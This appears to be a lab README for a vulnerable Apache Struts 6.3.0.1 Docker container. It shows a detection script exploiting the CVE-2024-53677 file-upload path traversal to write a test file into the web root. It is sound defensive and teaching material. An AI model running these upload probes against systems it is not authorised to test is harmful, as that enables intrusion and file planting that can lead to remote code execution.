The file upload logic in Apache Struts is flawed: an attacker can manipulate file upload parameters to achieve path traversal, and under some circumstances this leads to uploading a malicious file that can be used to perform remote code execution.
» git clone git@github.com:0xPThree/struts_cve-2024-53677.git
» cd struts_cve-2024-53677
» sudo docker build --ulimit nofile=122880:122880 -m 3G -t struts-6.3.0.1 .
» sudo docker run -p 8081:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name struts-6.3.0.1 struts-6.3.0.1
» curl http://127.0.0.1:8081/upload.action
<html>
<head>
<title>File upload</title>
</head>
<body>
<h1>Apache Struts 6.3.0.1</h1>
<p>Welcome to Apache Struts 6.3.0.1 lab. This application is vulnerable to CVE-2023-50164 and CVE-2024-53677.</p>
<form id="upload" name="upload" action="/upload.action;jsessionid=196954CE343A603EC7EE26FFF611D302" method="post" enctype="multipart/form-data">
<table class="wwFormTable">
<tr>
<td class="tdLabel"></td>
<td
class="tdInput"
><input type="file" name="upload" id="upload_upload"/></td>
</tr>
<tr>
<td colspan="2">
<div class="formButton"><input type="submit" value="Submit" id="upload_0"/></div>
</td>
</tr>
</table>
</form>
</body>
</html>
» curl http://127.0.0.1:8081/vuln_test.txt
<!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/vuln_test.txt] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.98</h3></body></html>
» python3 check.py -u http://127.0.0.1:8081 --upload_endpoint /upload.action
2025-01-07 12:21:20,822 [INFO] Starting detection process...
2025-01-07 12:21:20,822 [INFO] Starting detection for CVE-2024-53677 (S2-067)...
2025-01-07 12:21:20,823 [INFO] Sending test request to upload endpoint: http://127.0.0.1:8081/upload.action
2025-01-07 12:21:20,838 [INFO] [INFO] File upload request succeeded.
2025-01-07 12:21:20,838 [WARNING] [ALERT] File name overwrite detected. Target may be vulnerable!
2025-01-07 12:21:20,838 [INFO] Detection process completed.
» curl http://127.0.0.1:8081/vuln_test.txt
CVE-2024-53677 / S2-067 detection test.
» sudo docker exec -it struts-6.3.0.1 bash
root@b991eecb47b4:/usr/local/tomcat# cd webapps/ROOT
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# ls -al
total 28
drwxr-x--- 5 root root 4096 Jan 7 11:23 .
drwxr-xr-x 1 root root 4096 Jan 7 11:18 ..
drwxr-x--- 2 root root 4096 Jan 7 11:14 forbidden
-rw-r----- 1 root root 226 Jan 7 09:41 index.html
drwxr-x--- 3 root root 4096 Jan 7 11:14 META-INF
-rw-r----- 1 root root 39 Jan 7 11:23 vuln_test.txt
drwxr-x--- 4 root root 4096 Jan 7 11:14 WEB-INF
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# cat vuln_test.txt
CVE-2024-53677 / S2-067 detection test.